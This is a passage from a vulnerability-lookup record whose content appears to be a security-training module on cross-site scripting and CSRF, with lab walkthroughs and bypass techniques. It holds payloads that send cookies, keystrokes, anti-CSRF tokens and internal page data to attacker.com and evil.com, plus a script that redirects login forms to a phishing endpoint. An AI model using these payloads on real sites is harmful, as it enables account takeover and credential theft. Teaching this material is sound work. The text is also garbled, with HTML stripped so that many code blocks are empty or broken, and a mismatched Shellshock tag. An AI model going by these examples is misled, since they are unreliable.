(Time-of-Check-Time-of-Use) vulnerabilities, demonstrating how timing windows in file operations and database transactions can lead to privilege escalation. The author shares unconventional exploitation methods that bypass common race condition mitigations. Read more \n\n@bhhub", "creation_timestamp": "2025-08-20T13:37:56.000000Z"}, {"uuid": "69c4c0b3-ad41-498c-b11d-3d5c0ef2adb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://gist.github.com/riskiidice/ac2f41e06c7793e21f01794f469e3797", "content": "# Module 3: Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF)\n\n## Introduction\n\nIn this module, we explore two of the most prevalent and impactful web vulnerabilities: Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). While SQL injection allows attackers to manipulate database queries, XSS and CSRF target the trust relationship between a web application and its users' browsers. Understanding these vulnerabilities is critical for both offensive security testing and defensive coding.\n\nXSS vulnerabilities appear in approximately 45% of web applications tested by security researchers, according to OWASP survey data. The impact ranges from simple page defacement to complete account takeover through session hijacking. CSRF, while slightly less prevalent, remains a serious threat that can force authenticated users to perform unintended actions without their knowledge.\n\nThis module provides comprehensive coverage of XSS variants (reflected, stored, and DOM-based), detection techniques, filter bypass methods, and practical exploitation scenarios. We then transition into CSRF fundamentals, token-based defenses, and advanced bypass techniques. Each lesson includes real-world examples, code samples, and hands-on lab walkthroughs.\n\n---\n\n## Lesson 11: Cross-Site Scripting (XSS) Fundamentals\n\n### What is Cross-Site Scripting?\n\nCross-Site Scripting (XSS) is a vulnerability that allows an attacker to inject malicious scripts into web pages viewed by other users. Unlike SQL injection, which targets the backend database, XSS exploits the trust that a user's browser places in a website. When a vulnerable application includes attacker-controlled data in a web page without proper sanitization, the victim's browser will execute the malicious script as if it originated from the legitimate website.\n\nThe fundamental problem is that browsers cannot distinguish between scripts that legitimately belong to a website and scripts that were injected by an attacker. This trust relationship is the cornerstone of XSS exploitation.\n\n**Core vulnerability pattern:**\n```javascript\n// Vulnerable code: user input directly placed into HTML\ndocument.getElementById('welcome').innerHTML = \"Welcome, \" + userInput;\n```\n\nIf an attacker provides `` as their username, the browser will execute the JavaScript when that page is rendered.\n\n### Three Types of XSS\n\nXSS vulnerabilities are categorized into three distinct types based on how the malicious script is delivered and executed.\n\n**Reflected XSS** occurs when user input is immediately returned by a web application without proper sanitization. The attack is not persistent; it exists only when the victim clicks a specially crafted link. Search functions that display search terms, error messages that echo user input, and URL parameters that are displayed back to the user are common injection points.\n\nExample scenario: A search engine displays \"Results for: [user input]\" on the results page. When an attacker crafts a URL with a malicious script in the search parameter and tricks a victim into clicking it, the script executes in the victim's browser.\n\n**Stored XSS** (also called Persistent XSS) occurs when user input is stored on the server (typically in a database) and later served to other users without proper sanitization. This is the most dangerous type because the attack automatically affects every user who views the affected content. Blog comments, forum posts, user profiles, product reviews, and messaging systems are common targets.\n\nExample scenario: An attacker posts a comment containing `document.location='https://attacker.com/steal?cookie='+document.cookie` on a blog. Every visitor who views that comment will have their session cookies sent to the attacker's server.\n\n**DOM-based XSS** occurs when client-side JavaScript processes user input and writes it to a dangerous sink (like innerHTML or document.write) without proper sanitization. The key difference from reflected XSS is that the malicious input never reaches the server in some variants\u2014the attack happens entirely on the client side.\n\nExample scenario: A page uses JavaScript to read a parameter from the URL and display it using document.write(). No server-side code is involved in generating the vulnerable output.\n\n### How Browsers Execute JavaScript\n\nUnderstanding how browsers parse and execute HTML and JavaScript is essential for effective XSS testing and exploitation. Browsers use HTML parsers that build a Document Object Model (DOM) tree from raw HTML markup. When the parser encounters a `` tag, it immediately fetches and executes the referenced JavaScript before continuing to parse the rest of the document.\n\n**Script tag execution:**\n```html\n\n\n\n\n\n console.log(\"This executes immediately\");\n\n```\n\n**Event handler execution:** HTML elements can have event attributes that execute JavaScript when specific events occur. The browser executes these handlers when the specified event happens (click, mouseover, error, etc.).\n\n```html\n\nClick me\n\n\n\n\n\n\n\n\n\nHover here\n```\n\n**SVG execution:** Scalable Vector Graphics (SVG) is an XML-based image format that can contain embedded JavaScript. When the browser renders an SVG document, any embedded scripts execute in the context of the page embedding it.\n\n```html\n\n\n \n\n```\n\n**Payload delivery through different vectors:**\n```html\n\nalert(1)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n```\n\n### Basic XSS Detection\n\nDetecting XSS vulnerabilities requires systematic testing with payloads designed to trigger JavaScript execution. The most reliable detection method is injecting a payload that executes JavaScript and observing the result.\n\n**Fundamental detection payload:**\n```html\nalert(1)\n```\n\nIf this payload executes (by displaying an alert dialog), the page is vulnerable to XSS. The alert(1) function is chosen because it is a simple, harmless JavaScript call that produces a visible result without causing damage.\n\n**Image tag onerror handler:**\n```html\n\n```\n\nThis payload exploits the onerror event handler of the img element. When the browser attempts to load an image from source \"x\" (which doesn't exist), the onerror event fires and executes the JavaScript.\n\n**Why these payloads work:**\n```html\n\n\n\n\n```\n\n**Testing methodology:**\n1. Identify all user input points (parameters, headers, body content)\n2. Inject a basic XSS payload into each input point\n3. Observe whether the payload is reflected in the response\n4. Verify execution by checking for alert dialogs or using developer tools\n5. Document the context in which the payload executed (HTML body, attribute, URL, etc.)\n\n**Reflection detection in Burp Suite:**\n- Use the \"Find comments\" and \"Find scripts\" features to locate reflected input\n- Check the HTTP response for your payload in the raw response\n- Note the encoding and context of the reflection\n\n### Why XSS Works: The Root Cause\n\nXSS vulnerabilities arise from a fundamental failure: treating user input as trusted content. When an application takes data from users and includes it in web pages without proper validation and encoding, attackers can inject malicious scripts.\n\n**Vulnerable code pattern (PHP):**\n```php\n// User input directly inserted into HTML\necho \"Welcome, \" . $_GET['username'];\n\n// Generated HTML:\n// Welcome, alert(1)\n// Browser executes the script\n```\n\n**Vulnerable code pattern (JavaScript/Node.js):**\n```javascript\n// Express.js example\napp.get('/search', (req, res) => {\n res.send('\nResults for: ' + req.query.term + '');\n});\n// req.query.term is directly inserted without encoding\n```\n\n**Safe code pattern:**\n```php\n// Using htmlspecialchars for HTML context\necho \"Welcome, \" . htmlspecialchars($_GET['username'], ENT_QUOTES, 'UTF-8');\n\n// Generated HTML:\n// Welcome, alert(1)\n// No script execution occurs\n```\n\n**Safe code pattern (JavaScript):**\n```javascript\n// Using textContent instead of innerHTML\nelement.textContent = req.query.term;\n\n// Or encoding before innerHTML insertion\nfunction encodeForHTML(str) {\n return str.replace(/[&<>\"']/g, char => ({\n '&': '&',\n '<': '<',\n '>': '>',\n '\"': '\"',\n \"'\": '''\n })[char]);\n}\nelement.innerHTML = encodeForHTML(req.query.term);\n```\n\n### Real Impact of XSS\n\nThe impact of XSS extends far beyond simple alerts or page defacement. A successful XSS attack can lead to complete compromise of user accounts, theft of sensitive data, and persistent access to victim browsers.\n\n**Cookie theft and session hijacking:**\n```html\n\n\n document.location='https://attacker.com/steal?cookie='+document.cookie;\n\n```\n\nWhen this script executes in a victim's browser, their session cookie is sent to the attacker's server. The attacker can then use this cookie to impersonate the victim and take over their account. This is why HttpOnly flags on session cookies are critical\u2014they prevent JavaScript from accessing cookie values.\n\n**Keylogging:**\n```html\n\n document.addEventListener('keypress', function(e) {\n var key = e.key;\n new Image().src = 'https://attacker.com/log?key=' + key;\n });\n\n```\n\nEvery keystroke in the affected page is sent to the attacker's server. This can capture passwords, credit card numbers, personal messages, and other sensitive information.\n\n**Page defacement:**\n```html\n\n document.body.innerHTML = '\nThis site has been hacked';\n\n```\n\nThe attacker can completely modify the visual appearance of the page, damaging the website's reputation and potentially displaying phishing forms to steal credentials.\n\n**Session riding (CSRF combined with XSS):**\n```html\n\n fetch('/transfer?to=attacker&amount=1000', {\n method: 'POST',\n credentials: 'include'\n });\n\n```\n\nXSS can be combined with CSRF to perform actions on behalf of authenticated users. The script triggers a request to the target site with the victim's credentials, performing unauthorized actions.\n\n**Network reconnaissance:**\n```html\n\n // Scan internal network\n fetch('http://192.168.1.1/admin').then(r => r.text()).then(t => \n fetch('https://attacker.com/exfil?data=' + btoa(t))\n );\n\n```\n\nIn browser contexts with access to internal networks (such as when the vulnerable site is on an internal network), XSS can be used to scan and attack internal systems.\n\n**Attack flow diagram:**\n```\nAttacker Victim Vulnerable Website\n | | |\n |---Crafts malicious URL-->| |\n | | |\n | Clicks link |\n | | |\n | |---Requests page------------->|\n | | |\n | |<--Page with injected JS------|\n | | |\n | Browser executes |\n | malicious script |\n | | |\n |---Cookie sent to-------->| |\n | attacker server | |\n | | |\n```\n\n---\n\n## Lesson 12: Reflected XSS\n\n### Understanding Reflected XSS\n\nReflected XSS is the most common XSS variant, accounting for approximately 70% of all XSS vulnerabilities. The name derives from the behavior where user input is \"reflected\" back to the user in the response without being stored on the server. This means each attack requires the victim to click a specially crafted link.\n\nThe attack chain begins when an attacker creates a malicious URL containing an XSS payload in a parameter. The attacker then tricks a victim into clicking this link. When the victim clicks the link, their browser sends a request to the vulnerable website. The website processes the request, reflects the malicious input in the response, and the victim's browser executes the injected script.\n\n**Common injection points:**\n- Search query parameters\n- Error message displays\n- URL path parameters\n- Form field submissions\n- Any parameter whose value is displayed in the response\n\n**Vulnerable application flow:**\n```\n1. User requests: https://site.com/search?q=alert(1)\n2. Server receives: q = \"alert(1)\"\n3. Server generates response with: \"Results for: alert(1)\"\n4. Browser receives HTML with script tag\n5. Browser executes script\n```\n\n### URL Parameter Injection\n\nURL parameter injection is the primary method for delivering reflected XSS attacks. Understanding URL structure and parameter handling is essential for effective testing.\n\n**URL anatomy:**\n```\nhttps://example.com/path?param1=value1&param2=value2#anchor\n[protocol][ host ][path][ query string ][fragment]\n```\n\nThe query string (everything after the `?`) contains parameter name-value pairs separated by `&`. Special characters in URLs must be percent-encoded to avoid interpretation as delimiters or special characters.\n\n**Percent-encoding reference:**\n| Character | Encoded | Character | Encoded |\n|-----------|---------|-----------|---------|\n| space | %20 | < | %3C |\n| \" | %22 | > | %3E |\n| # | %23 | & | %26 |\n| % | %25 | = | %3D |\n| + | %2B | / | %2F |\n\n**Testing workflow:**\n1. Identify the parameter to test\n2. Insert a basic XSS payload\n3. Encode special characters\n4. Send the request\n5. Examine the response for payload reflection\n6. Verify script execution\n\n**Manual testing example:**\n```\nOriginal URL: https://site.com/search?q=coffee\n\nTest payload: https://site.com/search?q=alert(1)\n\nEncoded: https://site.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E\n```\n\n**Tools for parameter manipulation:**\n- Burp Suite Repeater: Manually modify parameters and examine responses\n- OWASP ZAP: Automated scanning with parameter fuzzing\n- Browser developer tools: Inspect DOM for reflection points\n\n### Testing in Burp Suite\n\nBurp Suite is the industry-standard tool for web application testing, and its features are particularly useful for XSS testing.\n\n**Setting up proxy interception:**\n1. Configure browser to use Burp as proxy (localhost:8080)\n2. Enable intercept in Proxy > Intercept\n3. Navigate to the target application\n4. Modify requests before forwarding\n\n**Using Repeater for XSS testing:**\n1. Right-click any request and \"Send to Repeater\"\n2. In the Repeater tab, modify parameter values\n3. Add XSS payloads to parameters\n4. Click \"Go\" to send the request\n5. Examine the response for reflection\n\n**Response analysis techniques:**\n- View the raw response to find reflected input\n- Use \"Find\" feature to locate your payload\n- Check the \"Pretty\" tab for rendered HTML\n- Use \"Render\" tab to see visual display\n\n**Scanner for automated detection:**\nBurp Suite Professional includes an active scan feature that automatically tests for XSS vulnerabilities. However, manual testing remains essential because automated scanners miss many vulnerabilities and produce false positives.\n\n**Identifying reflection points:**\n1. Look for your payload in the response body\n2. Note the HTML context (inside tag, in attribute, in URL, etc.)\n3. Check if characters are encoded or filtered\n4. Determine if the reflection point is in JavaScript context\n\n**Burp Professional XSS testing features:**\n- Intruder: Fuzz parameters with payload lists\n- Comparer: Compare responses with different payloads\n- Extender: Install XSS-focused extensions\n\n### Filter Bypass Techniques\n\nWeb applications often implement filters or Web Application Firewalls (WAF) that attempt to block XSS attacks. Understanding common bypass techniques is essential for successful exploitation.\n\n**Encoding bypass:**\nApplications may filter based on literal strings but fail to normalize encoded input.\n\n```html\n\nalert(1)\n\n\n%3Cscript%3Ealert(1)%3C/script%3E\n\nalert(1)\n\n\n```\n\n**Case variation bypass:**\nFilters that use case-sensitive matching can be bypassed with mixed case.\n\n```html\n\nalert(1)\n\n\nalert(1)\n\n\nalert(1)\n```\n\n**Polyglot payloads:**\n\nA polyglot is a payload that works in multiple contexts. These are designed to maximize the chance of successful exploitation across different filter implementations.\n\n```html\n\njavascript:/*--></\u88d8=?//\n<svg/onload=alert(1)>\n```\n\nThis payload:\n- Closes existing tags with `` to escape script contexts\n- Contains an SVG onload handler at the end that executes\n\n**Tag name bypass:**\n```html\n\n\n\n\n\n\n\n```\n\n**Event handler variations:**\n```html\n\n\n\n\n\n\n\n\n\n\n```\n\n**Null byte injection:**\n```html\nalert(1)\nalert(1)\n```\n\nSome parsers stop at null bytes or newlines, allowing the script tag to pass through filters.\n\n**Unicode normalization:**\n```html\n\n<\\x73\\x63\\x72\\x69\\x70\\x74>alert(1)</\\x73\\x63\\x72\\x69\\x70\\x74>\n```\n\nBrowsers may normalize Unicode characters, but server-side filters might not account for this.\n\n### Context Matters: Where Your Payload Lands\n\nThe context in which your XSS payload is reflected determines which exploitation techniques will work. Different contexts require different payload construction.\n\n**HTML body context:**\n```html\n\n\nYour search: alert(1)\n\n\nalert(1)\n```\n\n**HTML attribute context:**\n```html\n\n\n\n\n\" onload=\"alert(1)\n```\n\nWhen reflected inside an attribute value, you often need to break out of the attribute to inject event handlers.\n\n**URL context:**\n```html\n\n\n\n\njavascript:alert(1)\n```\n\n**JavaScript context:**\n```html\n\n\n var search = 'alert(1)';\n\n\n\n'; alert(1);//\n```\n\nWhen reflected in JavaScript context, you need to break out of the string literal.\n\n**Context detection checklist:**\n1. Is the payload inside a tag (body context)?\n2. Is it inside an attribute value?\n3. Is it inside a URL parameter?\n4. Is it inside a JavaScript string?\n5. Is HTML encoding applied?\n6. Are quotes escaped?\n\n### PortSwigger Academy Lab: Reflected XSS\n\nPortSwigger Academy provides excellent hands-on labs for learning XSS exploitation. Let's walk through a typical reflected XSS lab.\n\n**Lab: Reflected XSS in HTML anchor href attribute**\n\nThis lab contains a reflected XSS vulnerability in the search feedback feature. The reflection point is in the href attribute of a link, and the response does not encode HTML characters.\n\n**Lab setup:**\n- Target: https://ac...id.web-security-academy.net\n- Functionality: Search feature that displays search term in a link\n- Goal: Execute alert(document.cookie) to solve the lab\n\n**Step 1: Identify the reflection point**\n1. Navigate to the lab\n2. Enter a test string (e.g., \"test123\")\n3. Submit the search\n4. Examine where your input appears in the response\n5. Look for it in the resulting HTML\n\n**Step 2: Analyze the context**\nYou should find your input appearing in an anchor href attribute:\n```html\nClick here\n```\n\n**Step 3: Craft the payload**\nSince the reflection is in an href attribute, you can use the javascript: protocol:\n```html\njavascript:alert(document.cookie)\n```\n\n**Step 4: Build the exploit URL**\n```\nhttps://ac...id.web-security-academy.net/?search=javascript:alert(document.cookie)\n```\n\n**Step 5: Verify the solution**\nClick the resulting link and confirm the alert dialog displays your cookies.\n\n**Alternative approach using data: URL:**\n```html\ndata:text/html,alert(document.cookie)\n```\n\n**Lab: Reflected XSS into attribute with angle brackets HTML-encoded**\n\nThis lab demonstrates a common scenario where angle brackets are encoded but the payload can still exploit attribute contexts.\n\n**Analysis:**\nInput appears as: ``\nIf you try `alert(1)`, it becomes: ``\nThe script tags are displayed as text, not executed.\n\n**Solution: Break out of the attribute**\n```\n\" onload=\"alert(document.cookie)\n```\n\nResult: ``\n\n**Lab: Reflected XSS with nowhere to run**\n\nThis lab has a reflected XSS but with minimal context. The payload must be self-contained.\n\n**Analysis:**\nInput appears in: `\ntest`\n\n**Solution:**\n```html\nalert(document.cookie)\nalert(1)`\n3. Navigate to where the stored data is displayed\n4. Check if your payload executes\n5. Test with different contexts (inside tags, attributes, etc.)\n\n### The Persistent Nature of Stored XSS\n\nThe persistence of stored XSS creates significant risk because a single exploit can affect thousands of users without any additional action from the attacker.\n\n**Impact comparison:**\n\n| Type | Attack Delivery | Number of Victims | Duration |\n|------|-----------------|-------------------|----------|\n| Reflected | Requires victim to click link | Typically one per link | Momentary |\n| Stored | Automatic on page view | All page visitors | Indefinite |\n| DOM-based | Requires victim to click link | Typically one per link | Momentary |\n\n**Real-world attack scenario:**\nAn attacker posts a comment on a popular blog: `fetch('https://evil.com/steal?c='+document.cookie)`\n\nThe blog has 10,000 daily readers. Each reader who views the comments section has their session cookie stolen. The attacker does not need to phish any individual user\u2014the attack happens automatically.\n\n**Stored XSS in web caches:**\nIf the vulnerable content is cached by a CDN or proxy, the malicious script may be served from the cache, affecting users even after the original vulnerability is patched.\n\n**Persistence in databases:**\nUnless the stored payload is detected and removed, it remains in the database indefinitely. Even after a patch, the malicious content must be manually removed from storage.\n\n### PortSwigger Lab Walkthrough: Stored XSS in Comment Field\n\nLet's walk through a PortSwigger lab that demonstrates stored XSS in a comment field.\n\n**Lab: Stored XSS in blog comments**\n\nThis lab contains a stored XSS vulnerability in the blog comment functionality. The application does not properly sanitize user-submitted comments before displaying them.\n\n**Lab goal:** Execute alert(document.cookie) when viewing any blog post that has a comment containing the exploit.\n\n**Step 1: Navigate to the blog**\n1. Access the lab\n2. Click on any blog post\n3. Scroll to the comments section\n\n**Step 2: Identify the comment form**\nYou should see input fields for:\n- Name\n- Email\n- Comment text\n- Website (optional)\n\n**Step 3: Test for stored XSS**\n1. Enter the following in the comment field: `alert(1)`\n2. Fill other fields with test data\n3. Submit the comment\n4. View the blog post again\n5. Check if the alert executes\n\n**Step 4: Confirm the vulnerability**\nIf the alert executes, the lab is solved. The comment contains JavaScript that executes when other users view the page.\n\n**Step 5: Escalate to cookie theft**\nReal attacks don't stop at alerts. The actual payload would be:\n```html\n\n fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));\n\n```\n\n**Lab: Stored XSS in image upload**\n\nThis lab demonstrates stored XSS through file upload functionality. The application accepts image uploads but doesn't validate file content.\n\n**Analysis:**\n1. Upload functionality accepts any file type\n2. Files are stored and served statically\n3. Viewing the uploaded file executes any embedded JavaScript\n\n**Exploitation:**\n1. Create a file containing: `alert(document.cookie)`\n2. Name it with .jpg extension\n3. Upload the file\n4. View the uploaded file\n5. The script executes\n\n**Lab: Stored XSS in XML document**\n\nThis lab accepts XML uploads and displays them without proper sanitization.\n\n**Payload:**\n```xml\n\n\n alert(1)]]>\n\n```\n\n### Stored XSS + CSRF Chain\n\nCombining stored XSS with CSRF creates powerful attack chains. The stored XSS can be used to steal anti-CSRF tokens or perform actions on behalf of victims.\n\n**Attack scenario: Stealing anti-CSRF tokens**\n\nMany applications use anti-CSRF tokens to prevent cross-site request forgery. A stored XSS vulnerability can be used to read these tokens.\n\n```html\n\n // Read the anti-CSRF token from the page\n var token = document.getElementById('csrf-token').value;\n \n // Send it to the attacker\n fetch('https://attacker.com/steal?token=' + token);\n\n```\n\n**Attack scenario: Performing CSRF actions**\n\nOnce an attacker has a valid anti-CSRF token (either stolen or by exploiting XSS to make the request directly), they can perform actions on behalf of the victim.\n\n```html\n\n // Make the CSRF request using victim's session\n fetch('/change-email?email=attacker@evil.com', {\n method: 'POST',\n credentials: 'include'\n });\n\n```\n\n**Attack scenario: Stored XSS defacement with CSRF**\n\nAn attacker stores an XSS payload that modifies forms on the page to phish credentials.\n\n```html\n\n // Wait for page to fully load\n setTimeout(function() {\n // Find the login form\n var forms = document.getElementsByTagName('form');\n for (var i = 0; i < forms.length; i++) {\n if (forms[i].action.includes('/login')) {\n // Modify form to submit to attacker\n forms[i].action = 'https://attacker.com/phish';\n \n // Add hidden field to capture password\n var input = document.createElement('input');\n input.type = 'hidden';\n input.name = 'password';\n forms[i].appendChild(input);\n }\n }\n }, 1000);\n\n```\n\n**Attack scenario: Password change via stored XSS**\n\n```html\n\n // Get the anti-CSRF token\n var token = document.querySelector('input[name=\"csrf\"]').value;\n \n // Construct the password change request\n var body = 'csrf=' + encodeURIComponent(token);\n body += '&new_password=AttackerPassword123';\n \n // Send the request\n fetch('/account/change-password', {\n method: 'POST',\n headers: {'Content-Type': 'application/x-www-form-urlencoded'},\n body: body,\n credentials: 'include'\n });\n\n```\n\n**Real-world considerations:**\n- Anti-CSRF tokens may be tied to the session\n- Some actions may require re-authentication\n- Network-level protections may block external requests\n- Some applications use SameSite cookies\n\n---\n\n## Lesson 14: DOM-Based XSS\n\n### Understanding DOM-Based XSS\n\nDOM-based XSS is a variant where the vulnerability exists entirely on the client side. The server receives an HTTP request containing user input, but does not include the malicious data in its response. Instead, client-side JavaScript processes the input and writes it to a dangerous sink without proper sanitization.\n\nThe name \"DOM-based\" reflects that the vulnerability is in the Document Object Model (DOM) manipulation code. The browser's DOM processing is where the malicious script is executed.\n\n**Classic vs DOM-based comparison:**\n\n| Aspect | Classic XSS | DOM-Based XSS |\n|--------|-------------|---------------|\n| Server involvement | Reflects malicious input in response | May not reflect input at all |\n| Detection (server-side) | Input appears in HTTP response | No server-side evidence |\n| Exploitation delivery | Via server response | Via URL fragment or client-side input |\n| Analysis location | HTTP responses | JavaScript code |\n\n**Example vulnerable page:**\n```html\n\n\n\n Search\n\n\n \nSearch Results\n \n\n \n // Get the search term from URL parameter\n var params = new URLSearchParams(window.location.search);\n var term = params.get('q');\n \n // Display the search term\n document.getElementById('results').innerHTML = \n 'You searched for: ' + term;\n \n\n\n```\n\nWhen a user visits `page.html?q=alert(1)`, the server sends the page without the script. The client-side JavaScript reads the `q` parameter and inserts it into the DOM using innerHTML, causing script execution.\n\n### JavaScript Reads URL Params and Writes to Document\n\nThe core pattern of DOM-based XSS involves JavaScript reading user input from the URL and using it in dangerous DOM operations.\n\n**URL parsing in JavaScript:**\n```javascript\n// Method 1: URLSearchParams\nvar params = new URLSearchParams(window.location.search);\nvar value = params.get('param');\n\n// Method 2: Manual parsing\nvar url = new URL(window.location.href);\nvar value = url.searchParams.get('param');\n\n// Method 3: Legacy parsing\nvar query = window.location.search.substring(1);\nvar params = query.split('&');\n```\n\n**Common source \u2192 sink patterns:**\n\n**Source: location.search \u2192 Sink: innerHTML**\n```javascript\ndocument.getElementById('output').innerHTML = \n new URLSearchParams(window.location.search).get('q');\n```\n\n**Source: location.hash \u2192 Sink: document.write**\n```javascript\ndocument.write('\n' + location.hash + '');\n```\n\n**Source: document.referrer \u2192 Sink: eval**\n```javascript\neval('var user = \"' + document.referrer + '\";');\n```\n\n**Source: localStorage \u2192 Sink: innerHTML**\n```javascript\ndocument.getElementById('data').innerHTML = localStorage.getItem('prefs');\n```\n\n### No Server Round-Trip for Some Variants\n\nSome DOM-based XSS variants involve data that never reaches the server at all, making server-side detection impossible.\n\n**Fragment-based DOM XSS:**\nURL fragments (the part after #) are never sent to the server:\n```\nhttps://site.com/page.html#alert(1)\n```\n\nThe fragment is processed entirely by the client:\n```javascript\ndocument.write(location.hash.substring(1));\n```\n\n**Detection limitations:**\n- Server logs won't show the fragment\n- Web Application Firewalls can't filter fragments\n- Some proxy tools don't capture fragments\n- Client-side analysis is required\n\n**Browser-based detection:**\n1. Open the page in browser\n2. Examine the URL for parameters\n3. Check JavaScript for source/sink patterns\n4. Inject payloads and observe behavior\n5. Use browser developer tools to inspect DOM\n\n**Tools for DOM XSS detection:**\n- Browser DevTools: Step through JavaScript execution\n- Burp Suite Professional: JavaScript analysis features\n- Retire.js: Identify vulnerable JS libraries\n- Access the DOM via console to test payloads\n\n### Source and Sink Analysis\n\nUnderstanding the source-to-sink data flow is essential for identifying and exploiting DOM-based XSS.\n\n**Common sources (where attacker-controlled data comes from):**\n```javascript\n// URL components\nwindow.location.search\nwindow.location.hash\ndocument.URL\ndocument.documentURI\ndocument.baseURI\n\n// Referrer\ndocument.referrer\n\n// Storage\nlocalStorage.getItem('key')\nsessionStorage.getItem('key')\n\n// Messages\nwindow.postMessage\n\n// WebSocket\n// etc.\n```\n\n**Common sinks (where dangerous operations occur):**\n```javascript\n// Direct HTML manipulation\nelement.innerHTML = data\nelement.outerHTML = data\ndocument.write(data)\ndocument.writeln(data)\n\n// Event handlers\nelement.setAttribute('onclick', data)\nelement.setAttribute('onerror', data)\n\n// JavaScript execution\neval(data)\nsetTimeout(data, delay)\nsetInterval(data, delay)\nFunction(data)()\n\n// Script execution\nvar script = document.createElement('script');\nscript.textContent = data;\nelement.appendChild(script);\n\n// jQuery (various sinks)\n$(selector).html(data)\n$(selector).append(data)\n$(selector).prepend(data)\n```\n\n**Safe sinks (output without execution):**\n```javascript\n// Text content (safe)\nelement.textContent = data\nelement.innerText = data\n\n// Value property (safe)\ninput.value = data\n\n// CSS (relatively safe but can cause issues)\nelement.style.property = data\n```\n\n### Finding DOM XSS in JavaScript Code\n\nStatic analysis of JavaScript code can reveal DOM-based XSS vulnerabilities before dynamic testing.\n\n**Grep patterns for source identification:**\n```bash\n# Find URL property access\ngrep -n \"location\" *.js\ngrep -n \"document.URL\" *.js\ngrep -n \"document.referrer\" *.js\n\n# Find storage access\ngrep -n \"localStorage\" *.js\ngrep -n \"sessionStorage\" *.js\n\n# Find postMessage handling\ngrep -n \"postMessage\" *.js\n```\n\n**Grep patterns for sink identification:**\n```bash\n# Find dangerous DOM manipulation\ngrep -n \"innerHTML\" *.js\ngrep -n \"outerHTML\" *.js\ngrep -n \"document.write\" *.js\n\n# Find JavaScript execution\ngrep -n \"eval(\" *.js\ngrep -n \"setTimeout\" *.js\ngrep -n \"setInterval\" *.js\n\n# Find jQuery sinks\ngrep -n \"\\.html(\" *.js\ngrep -n \"\\.append(\" *.js\n```\n\n**Example vulnerable JavaScript:**\n```javascript\n// vulnerable.js\nfunction displayMessage() {\n // Source: location.hash\n var msg = window.location.hash.substring(1);\n \n // Sink: document.write\n document.write('\n' + msg + '');\n}\n\n// vulnerable.js\nfunction loadPreferences() {\n // Source: localStorage\n var theme = localStorage.getItem('theme');\n \n // Sink: innerHTML\n document.getElementById('theme-preview').innerHTML = theme;\n}\n\n// vulnerable.js\nfunction processSearch() {\n // Source: URL parameter\n var params = new URLSearchParams(window.location.search);\n var query = params.get('q');\n \n // Sink: eval (dangerous!)\n eval('displaySearch(\"' + query + '\")');\n}\n```\n\n**Analysis methodology:**\n1. Identify all JavaScript files loaded by the application\n2. Search for source patterns (location, document, storage)\n3. For each source, trace how the data flows\n4. Identify if the data reaches a sink\n5. Determine if sanitization occurs between source and sink\n\n### Example Vulnerable JavaScript Code\n\nLet's examine complete examples of vulnerable JavaScript to understand the patterns.\n\n**Example 1: Simple URL parameter to innerHTML**\n```javascript\n// This code is vulnerable to DOM XSS\nfunction showSearchResults() {\n // Get parameter from URL\n const urlParams = new URLSearchParams(window.location.search);\n const searchTerm = urlParams.get('search');\n \n // Display without sanitization\n document.getElementById('results').innerHTML = \n '\nResults for: ' + searchTerm + '';\n}\n```\n\n**Exploitation:**\n```\npage.html?search=\n```\n\n**Example 2: Fragment-based injection**\n```javascript\n// This code is vulnerable to fragment-based DOM XSS\nfunction displayTab() {\n // Get tab name from fragment\n const tab = window.location.hash.substring(1);\n \n // Display using document.write\n document.write('\n' + tab + '');\n}\n```\n\n**Exploitation:**\n```\npage.html#alert(1)\n```\n\n**Example 3: Using location.search directly**\n```javascript\n// Vulnerable pattern from jQuery Mobile\n$(document).ready(function() {\n var page = $.url().param('page');\n $('#content').html(page);\n});\n```\n\n**Exploitation:**\n```\n?page=\n```\n\n**Example 4: Multiple sources**\n```javascript\n// Vulnerable to multiple source injection\nfunction init() {\n // Can be controlled via URL or localStorage\n var config = localStorage.getItem('app-config') || \n window.location.search;\n \n // Dangerous sink\n document.getElementById('app').innerHTML = config;\n}\n```\n\n**Example 5: Complex flow with weak sanitization**\n```javascript\n// This code attempts to sanitize but fails\nfunction displayName() {\n var name = window.location.search.split('name=')[1];\n \n // Basic HTML entity encoding (incomplete)\n name = name.replace(//g, '>');\n \n // But attribute context still vulnerable\n document.getElementById('welcome').innerHTML = \n \"\" + name + \"\";\n}\n```\n\n**Exploitation:**\n```\n?name=' onload=alert(1) x='\n```\n\nResult: `' onload=alert(1) x='`\n\n**Safe version:**\n```javascript\n// Safe: using textContent instead of innerHTML\nfunction displayName() {\n var name = window.location.search.split('name=')[1];\n document.getElementById('welcome').textContent = name;\n}\n```\n\n---\n\n## Lesson 15: Cross-Site Request Forgery (CSRF)\n\n### What is CSRF?\n\nCross-Site Request Forgery (CSRF) is an attack that forces an authenticated user's browser to send HTTP requests to a target website without the user's knowledge or consent. Unlike XSS, which executes malicious code in the victim's browser, CSRF exploits the trust a website has in the user's browser.\n\nThe fundamental assumption behind CSRF is that a website trusts all requests coming from a user's browser, regardless of how the request was initiated. If a user is logged into their bank and visits a malicious website, that malicious site can force the browser to send requests to the bank\u2014transferring money, changing settings, or performing other actions.\n\n**CSRF vs XSS comparison:**\n\n| Aspect | CSRF | XSS |\n|--------|------|-----|\n| Attack target | The website | The user |\n| Code execution | None (browser sends request) | JavaScript executes |\n| Trust exploited | Website trusts browser | Browser trusts website |\n| Requirements | Active session, malicious link | Active session, malicious content |\n| Countermeasures | Anti-CSRF tokens | Input validation, output encoding |\n\n**Attack flow:**\n```\nAttacker Victim Browser Target Website\n | | |\n |--Creates malicious------>| |\n | page with auto-submit | |\n | form or script | |\n | | |\n | User visits |\n | malicious page |\n | | |\n | |---Forged request---------->|\n | | (with session cookie) |\n | | |\n | | Website processes |\n | | request as legitimate |\n | | |\n```\n\n### How CSRF Differs from XSS\n\nUnderstanding the distinction between CSRF and XSS is critical for both attack and defense.\n\n**XSS allows code execution:**\n```html\n\n\n // This code RUNS in the victim's browser\n fetch('/api/delete-account', {method: 'POST'});\n\n```\n\n**CSRF only triggers requests:**\n```html\n\n\n\n\n\n \n 